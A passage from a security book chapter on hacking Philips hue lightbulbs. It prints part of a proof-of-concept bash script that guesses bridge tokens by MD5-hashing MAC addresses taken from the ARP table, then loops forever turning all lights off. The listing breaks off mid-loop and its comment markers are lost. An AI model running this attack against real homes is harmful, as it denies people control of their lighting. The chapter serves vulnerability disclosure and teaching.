Example 1-1 contains the complete source code for the script.

Example 1-1. hue_blackout.bash

#!/bin/bash

This script demonstrates how malware can cause a sustained blackout on the

Philips hue lightbulb system.

By design, the hue client software uses the MD5 hash of the user's MAC

address to register with the hue bridge.

This script collects the ARP addresses on the victim’s laptop or desktop

to locate devices on the network that are likely to have been registered

with the bridge. It then calculates the MD5 hashes of each of the addresses

and uses the output to connect to the hue bridge and issue a command to

turn all the lights off. Once it finds a working token, it infinitely loops

through the same request, causing a continuous blackout (i.e., the lights

turn off again if the user physically switches the bulbs off and then on

again). If the user deregisters the associated device, the script goes back

to looking for more valid MAC addresses. If the user reregisters the same

device, the script will again cause a sustained blackout and repeat the

process.

Written by Nitesh Dhanjani

Get the internal IP of the bridge, which is advertised on the meethue portal.

while [ -z "$bridge_ip" ];
do
bridge_ip=($(curl --connect-timeout 5 -s https://www.meethue.com/api/nupnp
|awk '{match($0,/[0-9]+.[0-9]+.[0-9]+.[0-9]+/); ip =
substr($0,RSTART,RLENGTH); print ip}'))

If no bridge is found, try again in 10 minutes.

if [ -z "$bridge_ip" ];
then
sleep 600
fi
done

Bridge found, let's cycle through the MAC addresses and cause a blackout.

echo "Found bridge at $bridge_ip"

We never break out of this loop ;-)

while true;
do

Get MAC addresses from the ARP table

mac_addresses=( $(arp -a | awk '{print toupper($4)}') )

Cycle through the list

for m in "${mac_addresses[@]}"
do

CHAPTER 1: LIGHTS OUT—HACKING WIRELESS LIGHTBULBS TO CAUSE SUSTAINED

(^28) BLACKOUTS